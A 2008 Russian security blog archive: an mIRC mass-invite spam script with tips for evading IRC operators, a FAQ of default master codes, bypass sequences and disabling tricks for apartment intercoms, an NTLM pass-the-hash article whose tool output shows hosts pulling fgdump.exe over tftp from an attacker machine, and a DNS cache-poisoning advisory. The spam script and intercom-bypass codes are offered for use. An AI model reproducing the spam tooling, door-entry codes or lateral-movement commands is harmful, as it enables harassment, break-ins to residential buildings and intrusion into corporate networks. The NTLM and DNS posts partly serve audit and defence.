%invite_flag = join_kanalov
notice $me сбор ников по каналам...
timer_chan_list 0 2 al_chan_list
}
}
;end--- конец листа -----------
start--- сбор ников -----------
raw 353:*: {
if ( %invite_status == on ) && ( %invite_flag == join_kanalov ) {
%invite_count_nicks_i = 3
while ( %invite_count_nicks_i < $0 ) { inc %invite_count_nicks_i 1 if ( $ [ $+ [ %invite_count_nicks_i ] ] != $me ) { write chanel_nick_list.txt $ [ $+ [ %invite_count_nicks_i ] ] } } } } ;end---сбор ников ----------- on *:join:%invite_kanal: { if ( $nick == $me ) && ( %invite_reconnect == on ) && ( %invite_status == on ) timer_invite -m 0 %invite_time invite_al } on *:part:%invite_kanal: if ( %invite_yderzhivat == on ) && invite $nick $chan
Вставляйте код и жмите "ок".
Теперь жмем на меню со скриптами.
У меня оно называется "Смайл Скрипт", у Вас оно будет называться по другому, в зависимости от клиента, но находится это меню всегда в одном и том же месте - между "tools" и "windows".
Выбираем "invite script by elimS"
Видим следуйщее:
И если перейти на вкладку "дополнительные":
Что какая кнопочка значит:
Указать канал - указываем канал на который надо приглашать
Частота инвайта - указывайте с какой частой приглашать людей на канал.
Цыфра в милисекундах, где 1 секунда = 1000 милисекунд. Если вы укажите например 500 - это значит два человека в секунду. если 3000 это значит один человек за три секунды. На каждом сервере/сети есть свое ограничение на количество приглашений за отрезок времени. Если вы слишком часто приглашаете, то вам сервер будет отвечать "mesage target toofast". Есть два выхода: сделать быстро реконект и дальше продолжать приглашения с той же скоростью или же если реконект делаеться слишком долго, то просто указать цыфру больше, чтоб не так часто приглашать. Советую начинать с 1 человека за 2-3 секунды и там уже ориентируйтесь.
Величина канала - канал с минимальным количеством людей с которого собирать ники.
Так как в больших сетях очень много каналов где сидят по 1-10 человек, нету смысла с них собирать ники, лучше собрать с самых крупных.
Стоп - остановка скрипта.
На кого будет действовать скрипт - ставим галочки напротив тех, кого стоит приглашать. Советую опов и халфопов не приглашать - тогда на вас не так быстро обратят внимание.
Реконект при mesage target toofast - отключаеться и подключаеться к серверу, если сервер говорит вам что вы слишком часто приглашаете.
Удерживать на канале - если приглашенный человек покидает ваш канал, то он автоматом инвайтиться. Довольно часто у людей которые зашли на канал - стоит галочка автоджойн при инвайте, соответственно если они попробуют уйти с канала, они автоматом на него снова забросяться.
Начать инвайт из указаного ник-листа - может у вас есть выборка людей которых надо быстро проинвайтить.
Выбрать ник лист исключений - указывает файл с никами которых нельзя приглашать, например ники иркопов и админов сети.
Так же добавлять ники в исключения вы можете нажав правой кнопкой мышки на нике:
Пользуйтесь на здоровье, и пишите сюда все баги и пожелания.
пятница, ноября 07, 2008
IT-Безопасность: FAQ по открытию домофонов
Ответ: Открой корпус трубы, там стоит несколько джамперов, которые устанавливают номер квартиру, в которой установлена трубка (актуально для Rainkman).
Вопрос: Как войти в сервисное меню домофона Cifral?
Ответ: Нажать любую цифру и держать до появления надписи, затем ввести инженерный код.
Вопрос: Как войти в системное меню домофона Cifral?
Ответ: Нажать звонок и держать до появления надписи, затем ввести инженерный код.
Вопрос: Как войти в сервисное меню домофона Rainmann (Rainmann 2000 etc. и другие)?
Ответ: Нажимаешь кнопочку «ключ» и вводишь 9 8 7 6 5 4 , должен послышаться двойной звуковой сигнал. Затем вводи 1 2 3 4 5 6 , появится буква P. Ты вошел в систему управления домофоном. Теперь запоминай:
1 — Расширенные настройки домофона, советую самому там не копаться, а просто войти в эту менюшку, и идти попивать пиво неподалеку. Озадаченные жильцы сделают все за вас.
2 — Обычные настройки домофона.
3 — Подача сигнала.
4 — Блокировка двери.
5 — ????
6 — ???? (домофон виснет)
7 — ????
8 — Открыть дверь.
9 — ????
Это действует если только настройки не трогали, вместо 987654 может быть другой код.
Пашет на домофонах где на экранчике точка стоит слева.
Вопрос: Как войти в сервисное меню домофона VIZIT?
Ответ: #999-пикнет 2 раза-(мастер код, по умолчанию 1234)-пикнет 1 раз
если код не правильный то пиликнет двух тональным сигналом
значения кнопок:
1 — ???
2 — Установка индивидуальных кодов для квартир.
3 — Программирование ключей для входа.
4 — Стирание ключей из памяти.
5 — ???
6 — ???
7 — ???
8 — ???
9 — ???
* — Выход из режима.
# — Подтверждение установки.
Вопрос:Как войти в сервисное меню домофона Eltis?
Ответ: Также как в Cifral.
Вопрос: Как войти в сервисное меню домофона МЕТАКОМ?
Ответ: На клавиатуре набирай 65535 В (или #) далее 1234 В (или #) если все нормально то на дисплее появится [ ].
Вопрос: Как на время вывести из строя домофон с ключом-таблеткой?
Ответ: Берем пьезу из электрической зажигалки, и даем разряд в приемник ключа, помогает редко, лучше использовать шокер.
Вопрос: Как обнулить память домофона?
Ответ: Для этого надо найти откуда запитан домофон, обычно в щитке на первом этаже, там есть небольшой блок, он обычно очень хорошо спрятан, обнулить его просто дайте на 1, 6, 8 и 12м когу +1,5 вольта а -на 2 ногу и память домофона будет чиста как у младенца.
Но специалист восстановит это за 5 минут.
Также там есть COM-порт, но как его использовать неизвестно.
Вопрос: Как открыть дверь домофона Cifral?
Ответ: Если в подъезде есть квартиры с номерами 100, 200, 300, 400 и т.д., то можно попробовать ввести:
звонок 100 звонок 7272
звонок 200 звонок 7272
звонок 300 звонок 7272
звонок 400 звонок 7272
звонок 500 звонок 7272
звонок 600 звонок 7272
звонок 700 звонок 7272
звонок 800 звонок 7272
звонок 900 звонок 7272
звонок 100 звонок 7273
звонок 200 звонок 7273
звонок 300 звонок 7273
звонок 400 звонок 7273
звонок 500 звонок 7273
звонок 600 звонок 7273
звонок 700 звонок 7273
звонок 800 звонок 7273
звонок 900 звонок 7273
Вопрос: Как еще можно открыть Cifral?
Ответ: ВЫЗОВ 41 ВЫЗОВ 1410
Или просто ввести 07054. Иногда помогает.
Вопрос: Как можно открыть домофон Eltis?
Ответ: B 100 B 7273
В 100 В 2323
Также можно попробовать варианты от Cifral.
Вопрос: Как открыть дверь домофона VIZIT?
Ответ: Если стандартные настройки не меняли то *#4230 и дверь откроется.
Еще иногда помогает 12#345.
Вопрос: Как войти в системный режим домофона VIZIT?
Ответ: Для входа в системный режим нужно соединить выводы кабеля «ПРОГРАММИРОВАНИЕ» чаще всего для этого нужно снимать весь блок с двери, потому как данные выводы не выводят в щиток.
Вопрос: Чем отличаются сервисный и системный режим?
Ответ: Сервисный и системный режимы разные. Если снять блок с двери и включить системный режим то можно поменять все. Даже мастер код для входа в системный режим.
Вопрос: Как записать в память домофона VIZIT свой ключ?
Ответ: В режиме программирования нажмите 3, затем номер хаты, приложите ключ, нажмите # а потом *
Вопрос: Какие коды по умолчанию ставят в домофоны?
Ответ: 1234, 6767, 3535, 9999, 12345, 0000, 11639 (VIZIT).
Вопрос: Как открыть МЕТАКОМ?
Ответ: В сервисном меню нажать 8. Также помогает В (или #) 1234567.
Ответ: 65535-В-1234-В-8 или В-1-В-5702 или В-6-В-4568.
А: Нажать вызов, потом номер первой квартиры в подъезде, снова вызов(высветится "COD"), потом 5702... Дверь открыта!
Вопрос: Сколько мастер ключей может быть у домофона МЕТАКОМ?
Ответ: Только 1.
Вопрос: Можно ли ключи от домофона магнитом убить, или хоть покалечить?
Ответ: Нет, нельзя.
Вопрос: Как сменить системный код в домофоне Cifral?
Ответ: В режиме программирования 1 (p----) и вводи новый пасс.
Вопрос: Существуют спец-коды домофонов для открытия дверей спец-службами?
Ответ: Нет, таких кодов нет.
Вопрос: Как записать в память домофона Cifral свой ключ?
Ответ: В сервисном режиме нажать 5,затем ввести номер квартиры, домофон напишет TOUCH прикладываем ключ — он в памяти.
Вопрос: Как стереть ключ-таблетку из памяти домофона Cifral?
Ответ: В сервисном режиме нажать 5, затем ввести номер квартиры, на которую подключен ключ, затем нажать 9.
Вопрос: Как записать в память домофона Cifral оптический (плоский с дырками) ключ?
Ответ: В системном режиме нажать 5, затем ввести номер ячейки ключа (1, 2, 3), вставить ключ, нажать на звонок.
Вопрос: Как сменить общий код домофона Cifral?
Ответ: В сервисном меню нажмите 2, затем введите новый код, если код короче 4 цифр, то после ввода нажмите звонок.
Вопрос: Как сменить индивидуальный код домофона Cifral?
Ответ: В сервисном меню нажмите 3, затем номер квартиры, звонок, введите новый код, звонок, затем пойдет вызов, абонент должен будет дважды нажать на кнопку звонка.
Вопрос: Как отключить абонента домофона Cifral?
Ответ: В сервисном меню нажмите 4, затем 0, затем номер квартиры, затем звонок.
Вопрос: Как подключить абонента, которого отключили от домофона Cifral?
Ответ: В сервисном меню нажмите 4, затем 1, затем номер квартиры, затем звонок.
Вопрос: Какие настройки по умолчанию домофона Cyfral CCD-2094M?
Ответ: Код доступа в режим изменения параметров и настроек 123456.
Общий код 1234.
Номер таблицы индивидуальных кодов 000.
Номер первого абонента 1.
Кол-во абонентов, подлежащих обслуживанию 100.
Длительность сигнала Z 1.
Режим пользования общим кодом ВКЛ.
Режим пользования индивидуальным кодами ВКЛ.
Абоненты ВКЛ/ВЫКЛ.
в список обслуживания Звуковой сигнал №3.
Оповещение абонента об открывании двери индивидуальным ключом ВКЛ.
Вопрос: На домофоне VIZIT клавиш * и # нет, что делать?
Ответ: Есть C и K. С — * K — #.
Вопрос: Существует ли системное меню у старых домофонов (с ключом-«палкой»)?
Ответ: Нет.
Вопрос: Как еще можно открыть двери домофонов?
Ответ: Попробуйте закоротить лампочку на подъездном освещении, иногда помогает.
Ответ: Одну ногу ставим туда где открывается дверь и сильно тянем за ручку при рывке дверь открывается.
Ответ: Прижимаешь любой ключ от другого домофона и вводишь 8082 ключ 5454
Ответ: На рабочем домофоне горит одна точка. Затем нажми на кнопку с изображением ключа, на мониторе появится "---", вводи 987654 (слышится двойной звуковой сигнал), затем вводи 123456. Если на мониторе появилась буква "Р", значит, ты благополучно взял домофон под свой контроль. Теперь ты должен определить цель своей работы. Если тебе просто нужно открыть данную дверь, нажимай цифру "8", и дверь откроется.
Вопрос: Как открыть домофоны с сенсорной клавиатурой
Ответ: Пока зима, на домофоны с сенсорной клавиатурой действует такая штучка - берем нормальный комок снега, и прислоняем к клавиатуре Ждем, пока на дисплее появится надпись "Err" , заходим
Вопрос: Как открыть VIZIT БВД-342
Ответ: В меню я вошел (набрал #999) на экране появляется 1--2 нажимаешь 1 вроде входит.
среда, ноября 05, 2008
IT-Безопасность: NTLM не умер, он просто так пахнет
05 ноября, 2008
Антон Карпов
Аналитик по информационной безопасности Digital Security
a.karpov@dsec.ru
http://www.dsec.ru
О проблемах безопасности протоколов LM/NTLM сказано немало. Поэтому для того, чтобы в очередной раз поднимать эту тему, нужны некоторые причины. И такие причины есть. Во-первых, опыт проведения аудита в крупных корпоративных сетях наглядно показывает: по состоянию на конец 2008 года даже старый LanManager кое-где еще живее всех живых. Иными словами, данная статья, как и приведенная в статье утилита, никогда не были бы написаны, если бы их актуальность не была подтверждена регулярной практикой. Вторая причина является следствием первой и заключается в регулярном появлении на известных конференциях по безопасности (BlackHat, Defcon) материалов на заданную тематику, как и различного вида программных средств для проведения атак на NTLM-хэши. Поэтому скептикам, приготовившим аргумент в виде слова "Kerberos", рекомендуется глубоко вдохнуть и пойти проверить свою Windows-сеть на наличие описываемых проблем.
Немного скучной теории. Аутентификация и пароли
Чтобы понять, какую роль протокол NTLM играет в аутентификационном процессе на Windows-машине, рассмотрим, что же происходит после нажатия заветной комбинации Ctrl+Alt+Delete во время интерактивного входа в систему. Процесс Winlogon, а точнее, графическая библиотека GINA (Graphical Identification and Authentication) принимает введенные пользователем аутентификационные данные (имя пользователя и пароль, PIN-код от смарт-карты и т.п.) и инициирует обращение в LSA (Local Security Authority). В случае осуществления локального входа, LSA выполняет обращение в локальную SAM-базу для аутентификации пользователя и возвращает процессу Winlogon токен доступа. После этого, в случае успешной аутентификации, пользователь получает доступ к графической оболочке.
В случае использования доменной структуры пользователя аутентифицирует не локальная LSA, а LSA на контроллере домена, хранящего учетные записи доменных пользователей в Active Directory. Для удаленного взаимодействия этих подсистем (т.е. для аутентификации пользователя или компьютера по сети) используются т.н. аутентификационные пакеты (authentication package), реализующие различные протоколы аутентификации. Таковых всего два: NTLM (библиотека MSV1_0.dll) и Kerberos (библиотека Kerberos.dll). Начиная с Windows 2000, для совершения процедуры доменной аутентификации по умолчанию используется протокол Kerberos (строго говоря, начиная с Windows 2000 LSA по умолчанию выбирает пакет Kerberos вне зависимости от вида входа в систему, но этот аутентификационный пакет не умеет выполнять локальную аутентификацию, и в случае локального входа выполняется fallback на NTLM для обращения к SAM-базе с хэшами паролей).
Пароли в Windows шифруются одним из двух возможных способов: LM и NTLM-хэш. Слабости обоих алгоритмов общеизвестны: отсутствие т.н. «соли» (salt) для рандомизации выходной последовательности (строго говоря, протокол LM использует фиксированное значение «соли» - «KGS!@#$%», NTLM же представляет собой просто MD4-хэш пароля пользователя), что открывает возможность использования Rainbow-таблиц для подбора пароля. Кроме того, LM-хэш является крайне нестойким (максимальная длина пароля составляет 14 символов, недостающие символы дополняются нулями, а затем пароль делится на две части по 7 символов, которые шифруются отдельно с помощью алгоритма DES) и вскрывается с использованием современных вычислительных мощностей за конечное время.
В Windows штатно присутствует три механизма удаленной аутентификации, реализованных в аутентификационных пакетах NTLM и Kerberos, о которых сказано выше. Это LM/NTLM challenge-response, NTLMv2 challenge-response и Kerberos. Недостатки первых двух также общеизвестны: для аутентификации доменным пользователем совершенно необязательно иметь его пароль, так как в процедуре аутентификации используется только хэш пароля учетной записи пользователя. Именно на этом свойстве протокола построены атаки вида Pass-the-Hash, первое упоминание о которых датируется аж 1997 годом.
Зачем мне все это в 2008 году?
Наконец, мы подходим к главной причине, по которой в этой статье собраны материалы более чем десятилетней практики security-сообщества, и имя ей – обратная совместимость. Так, только лишь в Windows Vista / Windows Server 2008 генерация LM-хэшей по умолчанию отключена (опция NoLmHash в разделе реестра HKLM\SYSTEM\CurrentControlSet\Control\Lsa), все предыдущие версии ОС, включая самый распространенный на сегодняшний день в корпоративной среде Windows Server 2003, по умолчанию генерируют и хранят LM-хэши для паролей, длина которых меньше 14 символов. Однако это не самое страшное. Гораздо более неприятен следующий факт: не смотря на то, что все серверные версии Windows, начиная с Server 2000, по умолчанию используют Kerberos для удаленной аутентификации пользователя или ресурса, протокол LM/NTLM challenge-response все еще поддерживается и может быть использован, если клиент инициирует такое соединение. За эту поддержку отвечает ключ реестра LmCompatibilityLevel в разделе реестра HKLM\SYSTEM\CurrentControlSet\Control\Lsa, который может принимать целочисленное значение от 0 до 5. В Windows Server 2003 этот параметр по умолчанию имеет значение 2, в Windows Vista / Server 2003 – 3, и для контроллера домена означает возможность использования клиентом LM/NTLM или NTLMv2 challenge-response протокола для удаленной аутентификации.
Неудивительно, что в настоящее время широко распространены утилиты для «игр» с NTLM-хэшами, а сама задача получения хэша является более чем актуальной. Еще бы, ведь даже в сети, построенной на самой современной на текущий день серверной платформе Windows Server 2008, получение хотя бы одного хэша учетной записи, обладающей административными правами на каком-либо сервере, может привести к получению удаленного административного доступа к контроллеру домена, а значит, и ко всем серверам и рабочим станциям в домене. Этому способствует сильная связанность в корпоративных сетях: опыт проведения аудитов показывает, что ситуация, при которой обнаруженная на одном сервере учетная запись подойдет, по крайней мере, на еще один сервер, является более чем типичной. Получив, таким образом, доступ к новому серверу и сняв с него новые хэши паролей, есть большая вероятность инициировать лавинный процесс, который рано или поздно приведет к получению искомого: учетной записи администратора домена. При этом стоит отметить, что стойкость пароля не имеет никакого значения, ведь ничего не нужно расшифровывать – ни с помощью Rainbow-таблиц, ни «грубой силой».
Как получить хэши?
В «чистом виде» хэши можно получить следующими способами:
- Из AD-хранилища (в случае контроллера домена);
- Из локальной SAM-базы;
- Из кэша LSA, во время активной сессии пользователя.
Если с первыми двумя все понятно, то третий не стоит путать с т.н. “cached logon accounts”, которые хранятся в системе на случай необходимости входа в домен при недоступном контроллере. Во время активного локального или удаленного сеанса работы (например, когда администратор подключается по RDP для выполнения административных задач) LSA хранит активные credentials в памяти, откуда они могут быть получены с помощью таких утилит как whosthere.exe из набора Psh-toolkit (http://oss.coresecurity.com/projects/pshtoolkit.htm) или gsecdump.exe (http://www.truesec.com).
Существуют также альтернативные способы получения NTLM-хэшей, например, довольно эффективно показывает себя в корпоративных сетях перехват хэшей при совершении клиентским браузером NTLM HTTP-аутентификации. Летом 2008 года на конференции DefCon была продемонстрирована утилита Squirtle (http://code.google.com/p/squirtle/) для проведения подобных атак. Однако NTLM-хэш пароля в случае HTTP-аутентификации передается в сообщении (Type 3 message) в зашифрованном случайным значением (nonce) виде и не подходит для немедленного использования, требуя предварительной расшифровки. Поэтому данные методы, хоть и являются весьма интересными, выходят за рамки данной статьи.
PtH-Pwner
Существует большое количество утилит, которые позволяют подменять права текущего пользователя (credentials), используя полученный NTLM-хэш. Самые популярные – это iam.exe из вышеупомянутого набора Psh-toolkit и msvctl.exe от TrueSec. Они позволяют «представляться» в Windows-сети от имени скомпрометированной учетной записи для получения доступа к сетевым ресурсам. Однако у них имеется два недостатка. Первый – их использование ограничено win32-платформой, второй – обе эти утилиты слабо подходят для автоматизации рутинных задач. В то же время практика проведения аудитов защищенности не раз требовала легкого и удобного решения задач вида «на какие еще машины подойдет обнаруженный NTLM-хэш со взломанного сервера», «пройтись по взломанным серверам и добавить учетную запись, вытащить новые хэши паролей» и т.п. Для автоматизации таких задач был написан скрипт на языке shell, по сути являющийся удобной оболочкой для утилиты winexe (линуксовый аналог psexec), пропатченной для возможности аутентификации с помощью NTLM-хэша (http://www.foofus.net/jmk/passhash.html). За отсутствием богатой фантазии у автора скрипт назван pth-pwner и доступен по адресу http://www.dsec.ru/dsecrg/releases/pth-pwner.tar.gz.
Скрипт функционирует под ОС Linux и может работать в двух режимах. В первом он принимает в качестве аргументов имя пользователя (локального или доменного), хэш его пароля и адрес сервера (или подсети). Опционально может быть указан файл, в котором построчно указаны команды для выполнения на сервере (по умолчанию выполняется команда ipconfig), список хостов также может быть указан в файле и передан в качестве аргумента. После запуска утилита пытается аутентифицироваться переданным хэшем на указанных серверах и выполнить заданную команду.
$ ./pth-pwner -u CORP\\domadmin -s 64DFE7...F74F9B:ADF5F3...6BB49AD2 -h 10.11.0.6
[+] PtH-Pwner v. 1.0 (Aug 2008)
Running with the following credentials:
Username to login: domadmin
Domain: CORP
SMBHASH to use: 64DFE7...F74F9B:ADF5F3...6BB49AD2
Host/Subnet to scan: 10.11.0.6
Command to execute: ipconfig
[+] attacking 10.129.11.6
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.11.0.6
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.11.0.7
10.11.0.6 [CORP]: SUCCESS!
All done. 1 scanned, 1 succeeded
$ ./pth-pwner.sh -u LocAdmin -s 64DFE71...F74F9B:ADF5...116BB49AD2 -f hosts.txt -c commands.txt
[+] PtH-Pwner v. 1.0 (Aug 2008)
Running with the following credentials:
Username to login: LocAdmin
SMBHASH to use: 64DFE71...F74F9B:ADF5...116BB49AD2
Reading hosts from hosts.txt
Reading commands from commands.txt
[+] attacking 10.11.0.11
>>>>>>>> attempting to execute [tftp -i 10.11.0.141 GET fgdump.exe] on 10.11.0.11
Transfer successful: 974848 bytes in 1 second, 974848 bytes/s
10.11.0.11 [SERV11]: executing [tftp -i 10.11.0.141 GET fgdump.exe] -> SUCCESS!
[+] attacking 10.11.0.20
>>>>>>>> attempting to execute [tftp -i 10.11.0.141 GET fgdump.exe] on 10.11.0.20
Transfer successful: 974848 bytes in 1 second, 974848 bytes/s
10.11.0.20 [SERV20]: executing [tftp -i 10.11.0.141 GET fgdump.exe] -> SUCCESS!
...
Для еще большей автоматизации процесса можно воспользоваться вторым режимом работы скрипта. Предположим, у нас есть результат работы утилиты gsecdump.exe с какого-либо сервера. Передав при помощи ключа -g на вход скрипту вместо одного NTLM-хэша файл с хэшами в формате gsecdump, мы заставим его проверить каждую присутствующую в файле запись на возможность аутентификации на заданных хостах. Очевидно, что, передав в качестве команды закачивание и выполнение на скомпрометированных хостах утилиты gsecdump.exe, мы можем инициировать тот самый лавинный эффект, который приведет к взлому все большего и большего количества хостов на каждой итерации.
Как защититься?
Очевидно, что никакая парольная политика от описанных атак не спасет, так пароль не подвергается расшифровке, а значит, его стойкость не имеет никакого значения. Переход на двухфакторные методы аутентификации, как ни странно, тоже не исправит ситуацию. NTLM слишком «глубоко вшит» в систему и отключить его полностью не представляется возможным. Так, в Windows 2000 при переходе на аутентификацию по смарт-картам хэш пароля все равно хранится в базе без изменений. В Windows 2003 пароль меняется на случайную последовательность, но, как сказано выше, роли это никакой не играет.
Специалисты из Compass Security AG провели любопытное исследование (http://www.csnc.ch/static/download/Hash_Injection_Attack_E.pdf), в котором попытались как полностью деактивировать аутентификационный пакет NTLM в реестре, так и физически удалить библиотеку MSV1_0.dll с рабочей станции под управлением Windows XP в домене. В обоих случаях ни локальный, ни доменный вход систему стал невозможен.
Все типовые рекомендации (отключение хранения LM-хэшей на серверах и рабочих станциях, выставление параметра LmCompatibilityLevel в максимально возможное значение, отключение локального хранения кэшированных аккаунтов и последующая очистка кэша и т.п.) не являются панацеей от проблемы.
В какой-то степени помочь может принудительное шифрование трафика и аутентификация хостов с помощью IPSec, для невозможности использования хэша с недоверенных систем. Для этого необходимо настроить соответствующие политики на контроллере домена.
Выводы
Алгоритм LanManager (LM) был разработан в начале 90-х годов прошлого века. Операционная система Windows Server 2003 вышла тринадцать лет спустя. И тем не менее, в ней все еще хранились пароли пользователей, зашифрованные с применением этого алгоритма. Виновницей данного факта, как и того, что описанные в статье атаки далеко не первой свежести отлично работают в современных Windows-сетях, является она - та, которая вызывает скрип зубов у разработчиков и крики отчаяния пользователей. Имя ей - backward compatibility.
Ссылки по теме:
http://technet.microsoft.com/ru-ru/magazine/cc160954(en-us).aspx
http://technet.microsoft.com/en-us/library/cc780332.aspx
http://www.securitylab.ru/contest/212100.php
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://www.foofus.net/jmk/passhash.html
http://www.truesec.com/PublicStore/catalog/Downloads,223.aspx
http://www.csnc.ch/static/download/Hash_Injection_Attack_E.pdf
http://truesecurity.se/blogs/murray/archive/2007/03/16/why-an-exposed-lm-ntlm-hash-is-comparable-to-a-clear-text-password.aspx
http://www.innovation.ch/personal/ronald/ntlm.html
http://davenport.sourceforge.net/ntlm.html
http://www.foofus.net/fizzgig/fgdump/
http://carnal0wnage.blogspot.com/2008/03/msvctl-pass-hash-action.html
http://code.google.com/p/squirtle/
http://grutztopia.jingojango.net/
суббота, июля 26, 2008
IT-Безопасность: Уязвимость в DNS. Джин на свободе?
Краткое предисловие
DNS является одним из самых критичных компонентов сети Интернет, поэтому уязвимости в серверах имен всегда вызывали повышенный интерес у злоумышленников. 8-9 июля многие производители выпустили исправления, устраняющие фунаментальную ошибку, которая позволяет злоумышленнику произвести спуфинг атаку. Дэн Камински в своем блоге http://www.doxpara.com/?p=1165 опубликовал более подробное описание уязвимости и сделал доступным эксплоит.
В чем заключается уязвимость?
Уязвимость существует из-за того, что DNS сервер использует предсказуемый номер порта для отправки DNS запросов. Злоумышленник может угадать номер порта, который используется для отправки данных, и с помощью специально сформированного ложного DNS-ответа подменить данные в кеше DNS сервера.
Для подтверждения наличия уязвимости можно воспользоваться эксплоитами и утилитой:
BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (meta)
BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
Утилита http://www.onzra.com/CacheAudit-Latest.tgz
Насколько опасна уязвимость?
Спуфинг атака – атака, направленная в первую очередь на клиента, а не на сервер. Уязвимость, которую мы сейчас обсуждаем, неспособна дать повышенные привилегии на уязвимой системе или выполнить произвольный код, но в сочетании с другими незначительными ошибками программного обеспечения или социальной инженерией, может стать очень опасным инструментом в руках злоумышленника.
В тестах, которые проводил Камински, ему удалось отравить кеш сервера имен приблизительно за 5-10 секунд. Эта уязвимость позволяет атакующему перезаписать данные, которые уже находятся в кеше сервера. Сервера имен, которые являются только авторитетными, не подвержены этой уязвимости. Установка высокого значения TTL для ваших хостов на авторитетном сервере не помешает злоумышленнику отравить кеш уязвимых резолверов, так как атака обходит защиту TTL.
Уязвимость затрагивает также и клиентские библиотеки (рабочие станции и сервера, которые обращаются к вышестоящим серверам имен) и может быть проведена против одиночного хоста. Также, некоторые МСЭ с функционалом трансляции адресов, рассчитанные на домашний сектор, используют предсказуемые номера для порта источника запросов, что позволяет злоумышленнику удачно произвести атаку, даже если было установлено исправление на сервер имен или клиент.
Итак, подытожим:
Отравление кеша DNS сервера можно произвести довольно быстро (5-10 секунд)
Злоумышленник может изменить данные, которые уже находятся в кеше сервера
Уязвимость может использоваться как против сервера имен, так и против рабочей станции.
Сервера и рабочие станции, которые находятся за бюджетными МСЭ с включенным NAT, подвержены уязвимости не зависимо от установленных исправлений.
Эксплоит находится в публичном доступе.
Целью атаки может стать любой промежуточный DNS сервер на пути к авторитетному серверу или DNS клиент. Это означает, что если вышестоящий DNS сервер уязвим, то не зависимо от наличия исправлений на ваших серверах, вы можете стать жертвой атаки.
Векторы атаки
Как я уже писал выше, спуфинг атака – атака, направлена на клиента, а не на сервер. Злоумышленник может:
произвести фишинг атаку и получить доступ к важным данным
произвести атаку типа «Человек посередине» и получить доступ к потенциально важным данным (паролям, номерам кредитных карт и другим данным, которые вы передаете).
используя уязвимость в ПО, получить доступ к важным данным и даже скомпрометировать целевую систему (например, из-за недостаточной проверки подлинности сервера при установке обновлений приложения, при перенаправлении пользователя на специально сформированный сайт и т.д.).
Исправления
Для устранения уязвимости необходимо установить исправления не только на хосты, которые находятся под вашим контролем, но и на все сервера имен, которые участвуют в обмене данными, иначе всегда будет существовать возможность спуфинг атаки.
Исправления доступны для Windows, Linux, UNIX и других систем. Для получения исправления обратитесь к соответствующему производителю. Список производителей доступен по адресу: http://www.kb.cert.org/vuls/id/800113
Выводы
Уязвимость достаточно опасна и может эксплуатироваться как против сервера, так и против клиента. Исправления хотя и существуют, но установлены далеко не везде. Армагеддон, конечно же не наступает, но у злоумышленников появилась дополнительное преимущество, которым они не постесняются воспользоваться в последующих атаках на ваши сети.
_http://www.securitylab.ru/analytics/356362.php